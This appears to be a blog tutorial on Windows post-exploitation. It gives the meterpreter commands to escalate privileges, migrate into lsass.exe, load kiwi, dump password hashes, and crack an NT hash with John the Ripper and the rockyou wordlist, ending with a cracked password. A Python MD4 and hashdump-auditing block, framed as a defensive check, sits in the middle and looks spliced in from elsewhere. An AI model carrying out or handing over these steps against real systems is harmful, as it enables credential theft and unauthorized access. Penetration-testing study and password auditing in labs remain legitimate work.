In the previous article I demonstrated how to do privilege escalation on a Windows machine, and I promised to show post exploitation next. In this article I will demonstrate how to dump and crack the victim's user credentials on a Windows machine.
If you don't know how to get a meterpreter shell on the victim machine, check out my earlier article on getting a meterpreter shell on a target Windows machine.
Also, if you don't know how to do privilege escalation on the victim machine, check out my previous article, in which I demonstrated privilege escalation on the target machine.
Now, after getting a full-fledged meterpreter shell on the victim's machine, run the getsystem command to cross-check whether the privilege escalation succeeded:
getsystem
To list the processes the victim's machine is running at that moment, the command is
ps
After executing this command you will see the whole list of processes the system is running.
To check your current process ID:
getpid
To harvest the credentials I have to migrate to process ID 452, which is lsass.exe.
In short, the Local Security Authority Subsystem Service (lsass.exe) is the process that handles authentication on Windows; on an Active Directory domain controller it is responsible for Active Directory database lookups, authentication, and replication.
To migrate from the current process (fnTAZizrHE, PID=1912) to lsass.exe (PID=452), the command is as follows:
migrate 452
After migrating to lsass.exe, load the kiwi extension to harvest the credentials. The command is:
load kiwi
To see the credentials you have to dump the password hashes stored on the victim's machine. The command is:
hashdump
In short, hashing is the process of transforming any given key or string of characters into another value. This mechanism is what protects the stored credentials.
For this article I will be cracking the hash of the user Shadab. The last hash field on the line (after the final colon) is the password hash, so I will copy that hash into a text file.
To save the hash into a file, the command is
echo 7a2199…………….5f > victim.txt
Now the hash is saved in the victim.txt file. Next I will use John the Ripper, a password cracking tool.
Make sure you have unzipped the rockyou.txt.gz file in /usr/share/wordlists/. To unzip it, the command is
gunzip /usr/share/wordlists/rockyou.txt.gz
To crack the hashed password, the command is
john --format=NT victim.txt --wordlist=/usr/share/wordlists/rockyou.txt
John successfully cracked the password of the user Shadab:
User : Password
Shadab : 12345
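The reason the hashdump output above falls to a wordlist so quickly is that the NT hash is plain MD4 over the UTF-16LE password with no salt, so one MD4 per candidate word checks every account at once. The following is an added example, not code from the article: it parses the hashdump line format (user:rid:lmhash:nthash:::) and audits a dump the way a defender would audit their own accounts, flagging stored LM hashes, empty passwords and matches against a small weak-word list. The sample lines and the weak-word list are constructed; MD4 is implemented inline because hashlib may not provide it under OpenSSL 3.

```python
import struct

def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320); hashlib often lacks it on OpenSSL 3, so it is implemented here."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"                       # pad: 0x80, zeros, 64-bit bit length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = ((F, range(16), (3, 7, 11, 19), 0),
              (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
              (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1))
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + f(b, c, d) + X[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c                  # rotate the working registers
        a, b, c, d = [(x + y) & 0xFFFFFFFF for x, y in ((a, aa), (b, bb), (c, cc), (d, dd))]
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password, with no salt."""
    return md4(password.encode("utf-16-le")).hex()

def parse_hashdump(text: str):
    """Split hashdump lines 'user:rid:lmhash:nthash:::' into (user, rid, lm, nt)."""
    rows = [line.strip().split(":") for line in text.splitlines() if line.count(":") >= 3]
    return [(p[0], int(p[1]), p[2].lower(), p[3].lower()) for p in rows]

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored

def audit(text: str, weak_words) -> dict:
    """Map each account to its findings: stored LM hash, empty password, weak-list match."""
    lookup = {nt_hash(w): w for w in weak_words}   # unsalted: one MD4 per word covers every user
    findings = {}
    for user, rid, lm, nt in parse_hashdump(text):
        issues = []
        if lm != EMPTY_LM:
            issues.append("LM hash stored")
        if nt == nt_hash(""):
            issues.append("empty password")
        elif nt in lookup:
            issues.append("weak password: " + lookup[nt])
        findings[user] = issues
    return findings

# Constructed sample in hashdump format (not the article's real dump)
SAMPLE = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::"""
```

Calling audit(SAMPLE, ["password", "12345"]) flags Administrator for an empty password and alice for the weak password, while svc comes back clean; the fix on the defender's side is the same either way: enforce strong, unique passwords and keep LM hash storage disabled.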
I have successfully dumped the passwords of the victim's machine.
Hacking is illegal; practise this in your own lab environment.
In this short article I have tried to demonstrate how to dump the passwords of a victim's Windows machine using the Metasploit framework, the kiwi extension and John the Ripper, and also how to get a shell and escalate privileges on the machine for post exploitation. Next I will be covering how to set up persistence on a victim's Windows 7 machine.
Thank you for Reading!!
author: Shadab Mazhar